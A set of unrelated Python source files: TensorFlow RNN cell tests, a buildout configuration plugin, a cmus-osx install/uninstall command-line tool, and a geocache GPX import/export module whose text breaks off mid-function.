tf.nn.rnn_cell.GRUCell(3), 2)
g, new_m = cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1., 1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 3))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.231907, 0.231907]])
def testInputProjectionWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 3])
cell = tf.nn.rnn_cell.InputProjectionWrapper(
tf.nn.rnn_cell.GRUCell(3), num_proj=3)
g, new_m = cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 3))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.154605, 0.154605, 0.154605]])
def testDropoutWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 3])
m = tf.zeros([1, 3])
keep = tf.zeros([]) + 1
g, new_m = tf.nn.rnn_cell.DropoutWrapper(tf.nn.rnn_cell.GRUCell(3),
keep, keep)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1., 1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 3))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.154605, 0.154605, 0.154605]])
def testEmbeddingWrapper(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 1], dtype=tf.int32)
m = tf.zeros([1, 2])
embedding_cell = tf.nn.rnn_cell.EmbeddingWrapper(
tf.nn.rnn_cell.GRUCell(2),
embedding_classes=3, embedding_size=2)
self.assertEqual(embedding_cell.output_size, 2)
g, new_m = embedding_cell(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, new_m], {x.name: np.array([[1]]),
m.name: np.array([[0.1, 0.1]])})
self.assertEqual(res[1].shape, (1, 2))
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res[0], [[0.17139, 0.17139]])
def testEmbeddingWrapperWithDynamicRnn(self):
with self.test_session() as sess:
with tf.variable_scope("root"):
inputs = tf.convert_to_tensor([[[0], [0]]], dtype=tf.int64)
input_lengths = tf.convert_to_tensor([2], dtype=tf.int64)
embedding_cell = tf.nn.rnn_cell.EmbeddingWrapper(
tf.nn.rnn_cell.BasicLSTMCell(1, state_is_tuple=True),
embedding_classes=1,
embedding_size=2)
outputs, _ = tf.nn.dynamic_rnn(cell=embedding_cell,
inputs=inputs,
sequence_length=input_lengths,
dtype=tf.float32)
sess.run([tf.initialize_all_variables()])
# This will fail if output's dtype is inferred from input's.
sess.run(outputs)
def testMultiRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 4])
_, ml = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.GRUCell(2)] * 2)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run(ml, {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1, 0.1, 0.1]])})
# The numbers in results were not calculated, this is just a smoke test.
self.assertAllClose(res, [[0.175991, 0.175991,
0.13248, 0.13248]])
def testMultiRNNCellWithStateTuple(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m_bad = tf.zeros([1, 4])
m_good = (tf.zeros([1, 2]), tf.zeros([1, 2]))
# Test incorrectness of state
with self.assertRaisesRegexp(ValueError, "Expected state .* a tuple"):
tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.GRUCell(2)] * 2, state_is_tuple=True)(x, m_bad)
_, ml = tf.nn.rnn_cell.MultiRNNCell(
[tf.nn.rnn_cell.GRUCell(2)] * 2, state_is_tuple=True)(x, m_good)
sess.run([tf.initialize_all_variables()])
res = sess.run(ml, {x.name: np.array([[1., 1.]]),
m_good[0].name: np.array([[0.1, 0.1]]),
m_good[1].name: np.array([[0.1, 0.1]])})
# The numbers in results were not calculated, this is just a
# smoke test. However, these numbers should match those of
# the test testMultiRNNCell.
self.assertAllClose(res[0], [[0.175991, 0.175991]])
self.assertAllClose(res[1], [[0.13248, 0.13248]])
class SlimRNNCellTest(tf.test.TestCase):
def testBasicRNNCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
m = tf.zeros([1, 2])
my_cell = functools.partial(basic_rnn_cell, num_units=2)
# pylint: disable=protected-access
g, _ = tf.nn.rnn_cell._SlimRNNCell(my_cell)(x, m)
# pylint: enable=protected-access
sess.run([tf.initialize_all_variables()])
res = sess.run([g], {x.name: np.array([[1., 1.]]),
m.name: np.array([[0.1, 0.1]])})
self.assertEqual(res[0].shape, (1, 2))
def testBasicRNNCellMatch(self):
batch_size = 32
input_size = 100
num_units = 10
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
inputs = tf.random_uniform((batch_size, input_size))
_, initial_state = basic_rnn_cell(inputs, None, num_units)
my_cell = functools.partial(basic_rnn_cell, num_units=num_units)
# pylint: disable=protected-access
slim_cell = tf.nn.rnn_cell._SlimRNNCell(my_cell)
# pylint: enable=protected-access
slim_outputs, slim_state = slim_cell(inputs, initial_state)
rnn_cell = tf.nn.rnn_cell.BasicRNNCell(num_units)
outputs, state = rnn_cell(inputs, initial_state)
self.assertEqual(slim_outputs.get_shape(), outputs.get_shape())
self.assertEqual(slim_state.get_shape(), state.get_shape())
sess.run([tf.initialize_all_variables()])
res = sess.run([slim_outputs, slim_state, outputs, state])
self.assertAllClose(res[0], res[2])
self.assertAllClose(res[1], res[3])
def basic_rnn_cell(inputs, state, num_units, scope=None):
if state is None:
if inputs is not None:
batch_size = inputs.get_shape()[0]
dtype = inputs.dtype
else:
batch_size = 0
dtype = tf.float32
init_output = tf.zeros(tf.pack([batch_size, num_units]), dtype=dtype)
init_state = tf.zeros(tf.pack([batch_size, num_units]), dtype=dtype)
init_output.set_shape([batch_size, num_units])
init_state.set_shape([batch_size, num_units])
return init_output, init_state
else:
with tf.variable_op_scope([inputs, state], scope, "BasicRNNCell"):
output = tf.tanh(linear([inputs, state],
num_units, True))
return output, output
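# Note (added commentary): basic_rnn_cell above implements the plain RNN update
#   h_t = tanh(W [x_t, h_{t-1}] + b)
# via the deprecated `_linear` helper; when `state` is None it simply returns
# zero-filled output/state tensors of shape [batch_size, num_units].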
if __name__ == "__main__":
tf.test.main()
|
|
#!/usr/bin/env python
# Copyright (C) 2009, Mathieu PASQUET <mpa@makina-corpus.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the <ORGANIZATION> nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__docformat__ = 'restructuredtext en'
import os
import re
re_flags = re.M | re.U | re.I | re.S
from zope.interface import implements
from collective.generic.webbuilder import interfaces
from iniparse import INIConfig
from collective.generic.webbuilder.utils import remove_path
class DummyPlugin(object):
implements(interfaces.IPostGenerationPlugin)
def __init__(self, paster):
self.paster = paster
def process(self, output_dir):
print "I am a dummy plugin doing nothing inside %s for %s" % (
output_dir,
self.paster.configuration.name
)
def remove_egg_info(p):
for dirpath, dirnames, filenames in os.walk(p):
for filename in dirnames + filenames:
if 'egg-info' in filename:
remove_path(
os.path.join(dirpath, filename)
)
for directory in dirnames:
subdir = os.path.join(dirpath, directory)
remove_egg_info(subdir)
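# Illustrative note (added comment; the path is hypothetical): calling
# remove_egg_info('/tmp/project') removes any file or directory whose name
# contains 'egg-info' anywhere under /tmp/project, e.g.
# /tmp/project/src/my.package/my.package.egg-info.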
class EggInfoPlugin(DummyPlugin):
def process(self, output_dir, project_name, params):
remove_egg_info(output_dir)
class EggPlugin(DummyPlugin):
def process(self, output_dir, project_name, params):
"""."""
eggsnames = []
devnames = []
src_dir = os.path.join(output_dir, 'src')
for path in os.listdir(src_dir):
p = os.path.join(src_dir, path)
if os.path.isdir(p):
if os.path.exists(os.path.join(p, 'setup.py')):
eggsnames.append(path)
devnames.append(os.path.join('src', path))
zcmlnames = [n
for n in eggsnames
if (
('policy' in n)
or (n == project_name)
or (n == '%s.core' % project_name)
)]
f = os.path.join(output_dir, 'buildout.cfg')
sf = os.path.join(
output_dir, 'etc', 'project', 'sources.cfg')
pf = os.path.join(
output_dir, 'etc', 'project', '%s.cfg' % project_name)
if os.path.exists(pf):
f = pf
else:
for i in ['django', 'plone', 'pyramid']:
pf = os.path.join(
output_dir, 'etc', 'project', '%s.cfg' % i)
if os.path.exists(pf):
f = pf
cfg = INIConfig(open(f))
srccfg = None
if os.path.exists(sf):
srccfg = INIConfig(open(sf))
else:
srccfg = cfg
extdevoption_re = re.compile('develop\s*\+\s*', re_flags)
devoption_re = re.compile('develop\s*', re_flags)
autocheckout_option_re = re.compile(
'auto-checkout\s*', re_flags)
ext_autocheckout_option_re = re.compile(
'auto-checkout\s*\+\s*', re_flags)
exteggsoption_re = re.compile('eggs\s*\+\s*', re_flags)
eggsoption_re = re.compile('eggs\s*', re_flags)
devoption, eggsoption = 'develop+', 'eggs+'
devfound, eggsfound, acfound = False, False, False
for optionre in [ext_autocheckout_option_re,
autocheckout_option_re, ]:
if 'buildout' in cfg:
for option in cfg.buildout:
if optionre.match(option):
acfound = True
autocheckout = option
break
for optionre in [extdevoption_re, devoption_re, ]:
if 'buildout' in cfg:
for option in cfg.buildout:
if optionre.match(option):
devfound = True
devoption = option
break
for optionre in [exteggsoption_re, eggsoption_re, ]:
for option in cfg.buildout:
if optionre.match(option):
eggsfound = True
eggsoption = option
break
if eggsfound:
for eggn in eggsnames:
if not (eggn in cfg.buildout[eggsoption]):
cfg.buildout[eggsoption] = '\n '.join(
                        [a for a in (eggn,
                                     cfg.buildout[eggsoption].strip())
                         if a.strip()])
else:
cfg.buildout[eggsoption] = ''
for eggn in eggsnames:
cfg.buildout[eggsoption] = '\n '.join(
                    [a for a in (eggn,
                                 cfg.buildout[eggsoption].strip())
                     if a.strip()])
if srccfg:
if acfound:
for eggn in eggsnames:
if 'sources-dir' in cfg.buildout:
del cfg.buildout['sources-dir']
if not (eggn in cfg.buildout[autocheckout]):
cfg.buildout[autocheckout] = '\n '.join(
                            [a for a in (eggn,
                                         cfg.buildout[autocheckout].strip())
                             if a.strip()])
if not (eggn in cfg.sources):
cfg.sources[eggn] = 'fs %s' % (eggn,)
cfg.sources._lines[0].contents.insert(
1, cfg.sources._lines[0].contents.pop(-1))
else:
if devfound:
for eggn in devnames:
if not (eggn in cfg.buildout[devoption]):
cfg.buildout[devoption] = '\n '.join(
                            [a for a in (eggn,
                                         cfg.buildout[devoption].strip())
                             if a.strip()])
else:
cfg.buildout[devoption] = ''
for eggn in devnames:
cfg.buildout[devoption] = '\n '.join(
                        [a for a in (eggn,
                                     cfg.buildout[devoption].strip())
                         if a.strip()])
# zcml are now handled via collective.generic.skel
extzcmloption_re = re.compile('zcml\s*\+\s*', re_flags)
zcmloption_re = re.compile('zcml\s*', re_flags)
zcmlfound = False
for optionre in [extzcmloption_re, zcmloption_re, ]:
if 'buildout' in cfg:
for option in cfg.buildout:
if optionre.match(option):
zcmlfound = True
zcmloption = option
break
if zcmlfound:
for eggn in zcmlnames:
if 'buildout' in cfg:
if not (eggn in cfg.buildout[zcmloption]):
if (
('policy' in eggn)
or ('tma' in eggn)
or ('.core' in eggn)
or (project_name == eggn)
):
cfg.buildout[zcmloption] = '\n '.join([
                                a for a in (cfg.buildout[zcmloption].strip(),
                                            eggn)
                                if a.strip()])
else:
for eggn in zcmlnames:
if 'instance' in cfg:
if 'policy' in eggn:
oldzcml = ''
if 'zcml' in cfg.buildout:
oldzcml = cfg.buildout['zcml'].strip()
                        cfg.buildout['zcml'] = '\n '.join(
                            [a for a in (eggn, oldzcml)
                             if a.strip()])
f = open(f, 'w')
cfg = '%s' % cfg
cfg = cfg.replace('+ =', ' +=')
f.write(cfg)
f.close()
# plugin.process('/tmp/tmpRKqUZh')
# print open ( '%s/buildout.cfg' %'/tmp/tmpRKqUZh' ).read()
# vim:set et sts=4 ts=4 tw=80:
|
|
from dataclasses import dataclass
from os import chmod
from os import kill
from os import remove
from os import rename
from pathlib import Path
from shutil import rmtree
from signal import SIGTERM
from subprocess import call
from tempfile import NamedTemporaryFile
from typing import Optional
import click
from click import echo
from click import style
from .constants import AUTOSAVE_MISSING
from .constants import CMUS_OSX_FOLDER_NAME
from .constants import CONFIG_NAME
from .constants import COULD_NOT_LOCATED_CMUS_DIRECTORY
from .constants import ENV
from .constants import ENV_VAR_PREFIX
from .constants import RC_ENTRY_REGEX
from .constants import RC_SCRIPT_NAME
from .constants import SCRIPTS
from .constants import SDP_SCRIPT_NAME
from .constants import STATUS_DISPLAY_PROGRAM_REGEX
from .env import template
from .util import get_cmus_instances
from .util import locate_cmus_base_path
from .util import locate_editor
from .util import unexpanduser
class CmusConfig:
@dataclass
class _CmusConfig:
base_path: Path
# File that holds cmus commands that are executed on startup
rc_path: Path
# cmus config file
autosave_path: Path
    def __new__(cls) -> Optional["CmusConfig._CmusConfig"]:  # type: ignore
base_path = locate_cmus_base_path()
if base_path is not None:
return CmusConfig._CmusConfig(
base_path, base_path / "rc", base_path / "autosave"
)
else:
return None
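# Hedged usage sketch (illustrative only): CmusConfig() acts as a factory and
# returns either the nested _CmusConfig dataclass or None, e.g.
#
#   cmus_config = CmusConfig()
#   if cmus_config is not None:
#       print(cmus_config.rc_path)        # <base>/rc
#       print(cmus_config.autosave_path)  # <base>/autosave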
@click.group()
@click.pass_context
def entrypoint(ctx):
# Entrypoint is called directly
ctx.ensure_object(dict)
cmus_config = CmusConfig()
if cmus_config is not None:
cmus_osx_base_path = cmus_config.base_path / CMUS_OSX_FOLDER_NAME
cmus_osx_base_path.mkdir(exist_ok=True)
config_path = cmus_osx_base_path / CONFIG_NAME
if not config_path.is_file():
with open(config_path, "w") as f:
f.write(template(ENV_VAR_PREFIX, ENV))
if not cmus_config.rc_path.is_file():
cmus_config.rc_path.touch()
if not cmus_config.autosave_path.is_file():
echo(
f"{style('ERROR', fg='red')}: cmus config file missing (launch cmus at least once "
"before attempting installation)"
)
exit(AUTOSAVE_MISSING)
rc_script_path = cmus_config.base_path / CMUS_OSX_FOLDER_NAME / RC_SCRIPT_NAME
sdp_script_path = cmus_config.base_path / CMUS_OSX_FOLDER_NAME / SDP_SCRIPT_NAME
locals_ = locals()
for local in (local for local in locals_ if local != "ctx"):
ctx.obj[local] = locals_[local]
else:
echo(f"{style('ERROR', fg='red')}: Could not locate cmus config directory")
exit(COULD_NOT_LOCATED_CMUS_DIRECTORY)
@entrypoint.command()
@click.option("-f", "--force", is_flag=True)
@click.pass_context
def install(ctx, force):
cmus_config = ctx.obj["cmus_config"]
cmus_osx_base_path = ctx.obj["cmus_osx_base_path"]
rc_script_path = ctx.obj["rc_script_path"]
sdp_script_path = ctx.obj["sdp_script_path"]
cmus_osx_base_path.mkdir(exist_ok=True)
for script_name in SCRIPTS:
script_path = cmus_osx_base_path / script_name
with open(script_path, "w") as f:
f.write(f"{SCRIPTS[script_name]}\n")
chmod(script_path, 0o744)
write_rc = True
unexpanded_rc_script_path = unexpanduser(rc_script_path)
tmp_rc_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.rc_path, "r") as f:
for line in f:
match = RC_ENTRY_REGEX.match(line)
# Found invocation of 'rc' script
if match is not None and Path(match.group(1)) in (
rc_script_path,
unexpanded_rc_script_path,
):
write_rc = False
tmp_rc_file.write(line)
if write_rc:
tmp_rc_file.write(f"shell {str(unexpanded_rc_script_path)} &\n")
rename(tmp_rc_file.name, cmus_config.rc_path)
else:
remove(tmp_rc_file.name)
write_autosave = False
unexpand_sdp_script_path = unexpanduser(sdp_script_path)
tmp_autosave_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.autosave_path, "r") as f:
for line in f:
match = STATUS_DISPLAY_PROGRAM_REGEX.match(line)
if match is not None:
sdp_value = match.group(1)
# 'status_display_program' is not set
if sdp_value == "":
# Write 'status_display_program' without asking for permission
write_autosave = True
elif Path(sdp_value) not in (sdp_script_path, unexpand_sdp_script_path):
# Ask for permission
if force or click.confirm(
f"{style('WARNING', fg='yellow')}: "
f"'status_display_program' currently set to '{sdp_value}', "
"override?"
):
write_autosave = True
else:
echo(
f"{style('WARNING', fg='yellow')}: Manually set "
"'status_display_program' to "
f"'{str(unexpand_sdp_script_path)}'"
)
if write_autosave:
tmp_autosave_file.write(
f"set status_display_program={str(unexpand_sdp_script_path)}\n"
)
else:
tmp_autosave_file.write(line)
# No need to replace 'autosave' if no changes were written
if write_autosave:
rename(tmp_autosave_file.name, cmus_config.autosave_path)
else:
remove(tmp_autosave_file.name)
if not write_rc and not write_autosave:
echo(f"{style('NOTE', fg='magenta')}: Already installed.")
else:
echo(f"{style('SUCCESS', fg='green')}: Successfully installed.")
@entrypoint.command()
@click.pass_context
def uninstall(ctx):
cmus_config = ctx.obj["cmus_config"]
cmus_osx_base_path = ctx.obj["cmus_osx_base_path"]
rc_script_path = ctx.obj["rc_script_path"]
sdp_script_path = ctx.obj["sdp_script_path"]
try:
rmtree(cmus_osx_base_path)
except FileNotFoundError:
pass
cmus_instances = get_cmus_instances()
if cmus_instances is not None:
for pid in cmus_instances:
kill(pid, SIGTERM)
write_rc = False
tmp_rc_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.rc_path, "r") as f:
for line in f:
match = RC_ENTRY_REGEX.match(line)
# Exclude invocations of 'rc' script
if not (match is not None and Path(match.group(1)) == rc_script_path):
tmp_rc_file.write(line)
else:
write_rc = True
if write_rc:
rename(tmp_rc_file.name, cmus_config.rc_path)
else:
remove(tmp_rc_file.name)
write_autosave = False
tmp_autosave_file = NamedTemporaryFile("w", delete=False)
with open(cmus_config.autosave_path, "r") as f:
for line in f:
match = STATUS_DISPLAY_PROGRAM_REGEX.match(line)
# Exclude invocations of 'status_display_program' script
if not (match is not None and Path(match.group(1)) == sdp_script_path):
tmp_autosave_file.write(line)
else:
tmp_autosave_file.write("set status_display_program=\n")
write_autosave = True
# No need to replace 'autosave' if no changes were written
if write_autosave:
rename(tmp_autosave_file.name, cmus_config.autosave_path)
else:
remove(tmp_autosave_file.name)
if not write_rc and not write_autosave:
echo(f"{style('NOTE', fg='magenta')}: Already uninstalled.")
else:
echo(f"{style('SUCCESS', fg='green')}: Successfully uninstalled.")
@entrypoint.command()
@click.pass_context
def config(ctx):
cmus_osx_base_path = ctx.obj["cmus_osx_base_path"]
config_path = cmus_osx_base_path / CONFIG_NAME
editor = locate_editor()
if editor is None:
echo(
f"{style('ERROR', fg='red')}: Could not locate editor, "
f"manually edit '{str(config_path)}'"
)
else:
call([str(editor), str(config_path)])
|
|
from lxml import etree
from app import geocache_db
from geocache_model_sql import Cache, Cacher, CacheType, CacheContainer, CacheCountry, CacheState, CacheToAttribute, Waypoint, WaypointSym, WaypointType, Log, LogType, Attribute, UserNote
from geocache import Geocache
from db import DbInterface
import re
import datetime
import time
import calendar
from dateutil.parser import parse
GPX_NS = "http://www.topografix.com/GPX/1/0"
GPX = "{%s}" % GPX_NS
GS_NS = "http://www.groundspeak.com/cache/1/0/1"
GS = "{%s}" % GS_NS
XSI_NS = "http://www.w3.org/2001/XMLSchema-instance"
XSI = "{%s}" % XSI_NS
latmin = 0
latmax = 0
lonmin = 0
lonmax = 0
deleted_wpt = {}
log_pool = {}
cacher_pool = None
def coords_to_string(coord, str1, str2):
string = str1
if coord < 0:
coord = -coord
string = str2
degrees = int(coord)
string += ' ' + str(degrees) + ' ' + '%.3f' % ((coord - degrees) * 60)
return string
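# Illustrative example (added comment): coords_to_string(48.1234, 'N', 'S')
# returns 'N 48 7.404' and coords_to_string(-8.5, 'E', 'W') returns 'W 8 30.000'.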
def wpt_to_xml(parent, waypoint, geocache, data):
w_wpt = None
lat = waypoint['lat']
lon = waypoint['lon']
if waypoint['name'] == waypoint['gc_code']:
if geocache['coords_updated']:
lat = geocache['corr_lat']
lon = geocache['corr_lon']
data['latmin'] = min(data['latmin'], lat)
data['latmax'] = max(data['latmax'], lat)
data['lonmin'] = min(data['lonmin'], lon)
data['lonmax'] = max(data['lonmax'], lon)
w_wpt = subnode(parent, GPX+"wpt", attrib={'lat': str(lat), 'lon': str(lon)})
subnode(w_wpt, GPX+"time", text=waypoint['time'])
subnode(w_wpt, GPX+"name", text=waypoint['name'])
subnode(w_wpt, GPX+"cmt", text=waypoint['cmt'])
subnode(w_wpt, GPX+"desc", text=waypoint['descr'])
subnode(w_wpt, GPX+"url", text=waypoint['url'])
subnode(w_wpt, GPX+"urlname", text=waypoint['urlname'])
subnode(w_wpt, GPX+"sym", text=waypoint['sym'])
subnode(w_wpt, GPX+"type", text=waypoint['type'])
return w_wpt
def geocache_to_xml(parent, geocache, data):
wpt_node = None
print "DB01", geocache['waypoints']
for waypoint in geocache['waypoints']:
if waypoint['name'] == waypoint['gc_code']:
wpt_node = wpt_to_xml(parent, waypoint, geocache, data)
cache_node = subnode(wpt_node, GS+"cache", nsmap={'groundspeak':GS_NS},
attrib={
'id': str(geocache['id']),
'available': "True" if geocache['available'] else "False",
'archived': "True" if geocache['archived'] else "False"})
subnode(cache_node, GS+"name", text=geocache['name'])
subnode(cache_node, GS+"placed_by", text=geocache['placed_by'])
subnode(cache_node, GS+"owner", text=geocache['owner'], attrib={'id': str(geocache['owner_id'])})
subnode(cache_node, GS+"type", text=geocache['type'])
subnode(cache_node, GS+"container", text=geocache['container'])
if len(geocache['attributes']):
attr_node = subnode(cache_node, GS+"attributes")
for attribute in geocache['attributes']:
subnode(attr_node, GS+"attribute", text=attribute['name'],
attrib={
'id': str(attribute['gc_id']),
'inc': "1" if attribute['inc'] else "0"})
subnode(cache_node, GS+"difficulty", text=re.sub('\.0','', str(geocache['difficulty'])))
subnode(cache_node, GS+"terrain", text=re.sub('\.0','',str(geocache['terrain'])))
subnode(cache_node, GS+"country", text=geocache['country'])
subnode(cache_node, GS+"state", text=geocache['state'])
subnode(cache_node, GS+"short_description", text=geocache['short_desc'],
attrib={'html': "True" if geocache['short_html'] else "False"})
orig_coords_txt = ''
if geocache['coords_updated']:
orig_coords_txt = 'Original coordinates: ' + coords_to_string(geocache['lat'], 'N', 'S') + ' ' + coords_to_string(geocache['lon'], 'E', 'W')
if geocache['long_html']:
orig_coords_txt = '<p>' + orig_coords_txt + '</p>'
user_note = ''
if geocache['note_present']:
note = geocache_db.get_by_id(UserNote, geocache['id'])
user_note = note['note']
if geocache['long_html']:
user_note = '<div>' + user_note.replace("\n", "<br />") + '</div>'
subnode(cache_node, GS+"long_description", text=geocache['long_desc'] + orig_coords_txt + user_note,
attrib={'html': "True" if geocache['long_html'] else "False"})
subnode(cache_node, GS+"encoded_hints", text=geocache['encoded_hints'])
if len(geocache['logs']) and (data['max_logs'] > 0):
sort_logs = sorted(geocache['logs'], key=lambda log: log['date'])
logs_node = subnode(cache_node, GS+"logs")
for log in sort_logs[0:data['max_logs']]:
log_node = subnode(logs_node, GS+"log", attrib={'id': str(log['id'])})
subnode(log_node, GS+"date", text=log['date'])
subnode(log_node, GS+"type", text=log['type'])
subnode(log_node, GS+"finder", text=log['finder'], attrib={'id': str(log['finder_id'])})
subnode(log_node, GS+"text", text=log['text'], attrib={'encoded': 'True' if log['text_encoded'] else 'False'})
    if data['waypoints']:
        for waypoint in geocache['waypoints']:
            # The main cache waypoint (name == gc_code) was already exported
            # above; here only the additional child waypoints are written.
            if waypoint['name'] != waypoint['gc_code']:
                wpt_to_xml(parent, waypoint, geocache, data)
def subnode(parent, tag_name, text=None, attrib=None, nsmap=None):
node = etree.SubElement(parent, tag_name, nsmap=nsmap)
if text is not None:
node.text = text
if attrib is not None:
for name, val in attrib.iteritems():
node.attrib[name] = val
return node
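# Illustrative example (added comment): subnode(root, GPX+"name", text="demo")
# appends <name>demo</name> (in the GPX namespace) under root and returns the
# new element so further children can be attached to it.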
def export_gpx(data):
data['latmin'] = 1000.0
data['latmax'] = -1000.0
data['lonmin'] = 1000.0
data['lonmax'] = -1000.0
root = etree.Element(GPX+"gpx", nsmap={None:GPX_NS, "xsi":XSI_NS})
root.attrib["version"] = "1.0"
root.attrib["creator"] = "geodb, all rights reserved"
root.attrib[XSI+"schemaLocation"] = "{} {}/gpx.xsd {} {}/cache.xsd".format(GPX_NS,GPX_NS,GS_NS,GS_NS)
subnode(root, GPX+"name" , text="Cache Listing Generated by andyBee")
subnode(root, GPX+"desc" , text="This is an individual list of geocaches generated by andyBee.")
subnode(root, GPX+"author" , text="Hi, it's me: Jens Guballa")
subnode(root, GPX+"email" , text="andyBee@guballa.de")
subnode(root, GPX+"url" , text="http://www.guballa.de")
subnode(root, GPX+"urlname", text="Geocaching. What else?")
subnode(root, GPX+"time" , text=datetime.datetime.now().isoformat())
subnode(root, GPX+"keyword", text="cache, geocache")
bounds = subnode(root, GPX+"bounds")
for id in data['list']:
geocache = Geocache(id, geocache_db).fetch_singular()
geocache_to_xml(root, geocache.get_data(), data)
bounds.attrib['minlat'] = str(data['latmin'])
bounds.attrib['minlon'] = str(data['lonmin'])
bounds.attrib['maxlat'] = str(data['latmax'])
bounds.attrib['maxlon'] = str(data['lonmax'])
et = etree.ElementTree(root)
return etree.tostring(et, pretty_print=True, encoding="UTF-8", xml_declaration=True)
class GpxImporter():
def __init__(self, geocache_db, max_logs, pref_owner):
self.waypoint_itf = DbInterface(geocache_db, Waypoint)
self.waypoint_sym_itf = DbInterface(geocache_db, WaypointSym)
self.waypoint_type_itf = DbInterface(geocache_db, WaypointType)
self.cache_itf = DbInterface(geocache_db, Cache)
self.cache_type_itf = DbInterface(geocache_db, CacheType)
self.cache_state_itf = DbInterface(geocache_db, CacheState)
self.cache_country_itf = DbInterface(geocache_db, CacheCountry)
self.cache_container_itf = DbInterface(geocache_db, CacheContainer)
self.cache_to_attribute_itf = DbInterface(geocache_db, CacheToAttribute)
self.cacher_itf = CacherInterface(geocache_db, Cacher)
self.log_type_itf = DbInterface(geocache_db, LogType)
self.log_itf = LogInterface(geocache_db, Log)
self.db = geocache_db
self.deleted_wpt = {}
self.max_logs = max_logs
self.pref_owner = pref_owner
self.last_updated = 0
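# Parse a GPX file: read the global <time> element first, then parse every <wpt>
# (including its embedded groundspeak <cache>) and merge it into the database; the
# final UPDATE re-links additional waypoints to their parent cache via gc_code.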
def import_gpx(self, gpx_file):
try:
start = time.time()
tree = etree.parse(gpx_file)
end = time.time()
except:
return
gpx = tree.getroot()
if gpx.tag == GPX+"gpx":
# First, parse all the common elements
for node in gpx:
if node.tag == GPX+"time":
self.last_updated = calendar.timegm(parse(node.text).utctimetuple())
break
# Second, parse all waypoints
for node in gpx:
if node.tag == GPX+"wpt":
wpt = self._parse_wpt(node)
self._merge_wpt(wpt)
geocache_db.execute('''UPDATE waypoint
SET cache_id = (SELECT cache.id FROM cache WHERE cache.gc_code = waypoint.gc_code)
WHERE cache_id IS NULL''')
self.db.commit()
def _parse_wpt(self, node):
wpt = Waypoint()
wpt.cache = None
wpt.db['lat'] = float(node.get("lat"))
wpt.db['lon'] = float(node.get("lon"))
for child in node:
if child.tag == GPX+"time":
wpt.db['time'] = child.text
elif child.tag == GPX+"name":
wpt.db['name'] = child.text
wpt.db['gc_code'] = re.sub('^..', 'GC', child.text)
elif child.tag == GPX+"desc":
wpt.db['descr'] = child.text
elif child.tag == GPX+"url":
wpt.db['url'] = child.text
elif child.tag == GPX+"urlname":
wpt.db['urlname'] = child.text
elif child.tag == GPX+"sym":
wpt.sym = child.text
wpt.db['sym_id'] = self.waypoint_sym_itf.create_singleton_value('name', child.text)
elif child.tag == GPX+"type":
#wpt.db['type_id'] = geocache_db.create_singleton_id(WaypointType, {'name': child.text})
wpt.db['type_id'] = self.waypoint_type_itf.create_singleton_value('name', child.text)
elif child.tag == GPX+"cmt":
wpt.db['cmt'] = child.text
elif child.tag == GS+"cache":
wpt.cache = self._parse_cache(child)
wpt.db['cache_id'] = wpt.cache.db['id']
if wpt.cache is not None:
